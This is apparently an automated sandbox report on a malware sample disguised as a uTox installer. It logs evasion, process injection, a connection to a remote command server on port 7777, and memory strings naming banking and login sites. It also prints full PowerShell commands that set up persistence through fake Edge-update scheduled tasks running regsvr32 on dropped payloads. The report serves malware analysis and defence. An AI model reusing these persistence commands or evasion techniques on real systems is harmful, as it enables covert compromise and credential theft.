Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Windows\System32\regsvr32.exe Memory allocated: E50000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Memory allocated: 1B120000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Memory allocated: 910000 memory reserve | memory write watch
Source: C:\Windows\System32\regsvr32.exe Memory allocated: 1A340000 memory reserve | memory write watch
Contains functionality to query network adapater information
Source: C:\Windows\System32\dllhost.exe Code function: GetAdaptersInfo, 15_2_000002913DF12AC4
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4880 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4961 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6429 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3194 Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Window / User API: threadDelayed 376 Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Window / User API: threadDelayed 3434 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6959
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2672
Source: C:\Windows\System32\regsvr32.exe Window / User API: threadDelayed 3130
Source: C:\Windows\System32\regsvr32.exe Window / User API: threadDelayed 6728
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System32\rekeywiz.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\oSyU.ini Jump to dropped file
Source: C:\Users\Public\ajbs50ul.bat Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\4smg.ini Jump to dropped file
Found evasive API chain checking for process token information
Source: C:\Windows\System32\regsvr32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Found large amount of non-executed APIs
Source: C:\Users\Public\ajbs50ul.bat API coverage: 1.4 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6752 Thread sleep time: -11068046444225724s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2340 Thread sleep count: 6429 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2340 Thread sleep count: 3194 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1912 Thread sleep time: -5534023222112862s >= -30000s Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 5468 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe TID: 1732 Thread sleep time: -63600s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe TID: 1732 Thread sleep time: -686800s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8 Thread sleep count: 6959 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8 Thread sleep count: 2672 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2000 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 6432 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 6764 Thread sleep count: 3130 > 30
Source: C:\Windows\System32\regsvr32.exe TID: 6764 Thread sleep count: 6728 > 30
Source: C:\Windows\System32\regsvr32.exe TID: 3700 Thread sleep time: -27670116110564310s >= -30000s
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\OpenWith.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\OpenWith.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\regsvr32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E9440F0 memcpy,memcpy,memset,FindFirstFileW,memcpy,GetLastError,FindClose,GetLastError, 3_2_00007FF79E9440F0
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6C22D0 GetSystemInfo,VirtualAlloc, 14_2_00000203FE6C22D0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: powershell.exe, 00000004.00000002.1441747026.000001D89839A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: OpenWith.exe, 0000000B.00000003.1627826487.000001BD88044000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkmbolicLinkSymbolicLink
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: OpenWith.exe, 0000000B.00000003.1627826487.000001BD88044000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkLinkcLinkSymbolicLink
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696492231s
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696492231
Source: OpenWith.exe, 0000000B.00000003.1594021561.000001BD8757A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkymbolicLinkcLinkSymbolicLinkA
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: powershell.exe, 00000001.00000002.1553292127.0000018C26262000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: powershell.exe, 00000004.00000002.1441747026.000001D89839A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696492231f
Source: utox_x86_x64.exe, 00000008.00000002.2596384232.0000000000D0F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696492231
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696492231j
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: powershell.exe, 00000004.00000002.1441747026.000001D89839A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696492231o
Source: OpenWith.exe, 0000000B.00000003.1511290183.000001BD87830000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: DisableGuestVmNetworkConnectivity
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: OpenWith.exe, 0000000B.00000003.1635909346.000001BD88049000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Prod_VMware_SATA_CD00#4&224f42ef&0&0
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: OpenWith.exe, 0000000B.00000003.1511290183.000001BD87830000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: EnableGuestVmNetworkConnectivity
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E942CF0 GetProcessHeap,HeapAlloc, 3_2_00007FF79E942CF0
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E8F1180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm, 3_2_00007FF79E8F1180
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79EACBC00 SetUnhandledExceptionFilter, 3_2_00007FF79EACBC00
Source: C:\Users\Public\ajbs50ul.bat Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\regsvr32.exe Network Connect: 185.196.9.174 7777
Yara detected Powershell download and execute
Source: Yara match File source: amsi64_5884.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5884, type: MEMORYSTR
.NET source code references suspicious native API functions
Source: 7.2.regsvr32.exe.2f20000.1.raw.unpack, Flutter.cs Reference to suspicious API methods: VirtualAlloc(IntPtr.Zero, new IntPtr(65536), MEM_COMMIT, 4u)
Source: 7.2.regsvr32.exe.2f20000.1.raw.unpack, Flutter.cs Reference to suspicious API methods: Marshal.WriteIntPtr(new IntPtr(intPtr.ToInt64() + num), GetProcAddress(moduleHandle, array[i]))
Source: 7.2.regsvr32.exe.2f20000.1.raw.unpack, Flutter.cs Reference to suspicious API methods: VirtualProtect(intPtr, 65536u, 64u, out var _)
Allocates memory in foreign processes
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Memory allocated: C:\Windows\System32\dllhost.exe base: 2913DF10000 protect: page read and write
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Users\Public\ajbs50ul.bat NtWriteFile: Indirect: 0x7FF79E947076 Jump to behavior
Sets debug register (to hijack the execution of another thread)
Source: C:\Windows\System32\regsvr32.exe Thread register set: 1316 5 Jump to behavior
Writes to foreign memory regions
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Memory written: C:\Windows\System32\dllhost.exe base: 2913DF10000
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Memory written: C:\Windows\System32\dllhost.exe base: 7FF7D87314E0
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\Public\ajbs50ul.bat "C:\Users\Public\ajbs50ul.bat" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\Desktop\utox_x86_x64.exe "C:\Users\user\Desktop\utox_x86_x64.exe" Jump to behavior
Source: C:\Users\Public\ajbs50ul.bat Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/4smg.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{C804C8C0-8CC0-4804-C048-00888CC0048C}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)" Jump to behavior
Source: C:\Users\Public\ajbs50ul.bat Process created: C:\Windows\System32\regsvr32.exe "regsvr32" /s /i:INSTALL C:\Users\user\AppData/Roaming/4smg.ini Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe" Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process created: C:\Program Files\Windows Media Player\wmpnscfg.exe "C:\Program Files\Windows Media Player\wmpnscfg.exe" Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process created: C:\Windows\System32\rekeywiz.exe "C:\Windows\system32\rekeywiz.exe" Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process created: C:\Windows\System32\rekeywiz.exe "C:\Windows\system32\rekeywiz.exe" Jump to behavior
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Process created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
Source: C:\Windows\System32\rekeywiz.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/oSyU.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{848CC004-CC00-4888-C000-44488CCC0488}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
Source: C:\Windows\System32\rekeywiz.exe Process created: C:\Windows\System32\regsvr32.exe "regsvr32" /s /i:INSTALL C:\Users\user\AppData/Roaming/oSyU.ini
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Users\Public\ajbs50ul.bat Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "register-scheduledtask -action (new-scheduledtaskaction -execute \"regsvr32\" -argument \"/s /i:install c:\users\user\appdata/roaming/4smg.ini\") -trigger (new-scheduledtasktrigger -once -at (get-date).addminutes(1) -repetitioninterval (new-timespan -minutes 1)) -taskname 'microsoftedgeupdatetaskmachineua{c804c8c0-8cc0-4804-c048-00888cc0048c}' -description 'default' -settings (new-scheduledtasksettingsset -allowstartifonbatteries -dontstopifgoingonbatteries)"
Source: C:\Windows\System32\rekeywiz.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "register-scheduledtask -action (new-scheduledtaskaction -execute \"regsvr32\" -argument \"/s /i:install c:\users\user\appdata/roaming/osyu.ini\") -trigger (new-scheduledtasktrigger -once -at (get-date).addminutes(1) -repetitioninterval (new-timespan -minutes 1)) -taskname 'microsoftedgeupdatetaskmachineua{848cc004-cc00-4888-c000-44488ccc0488}' -description 'default' -settings (new-scheduledtasksettingsset -allowstartifonbatteries -dontstopifgoingonbatteries)"
Source: C:\Users\Public\ajbs50ul.bat Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "register-scheduledtask -action (new-scheduledtaskaction -execute \"regsvr32\" -argument \"/s /i:install c:\users\user\appdata/roaming/4smg.ini\") -trigger (new-scheduledtasktrigger -once -at (get-date).addminutes(1) -repetitioninterval (new-timespan -minutes 1)) -taskname 'microsoftedgeupdatetaskmachineua{c804c8c0-8cc0-4804-c048-00888cc0048c}' -description 'default' -settings (new-scheduledtasksettingsset -allowstartifonbatteries -dontstopifgoingonbatteries)" Jump to behavior
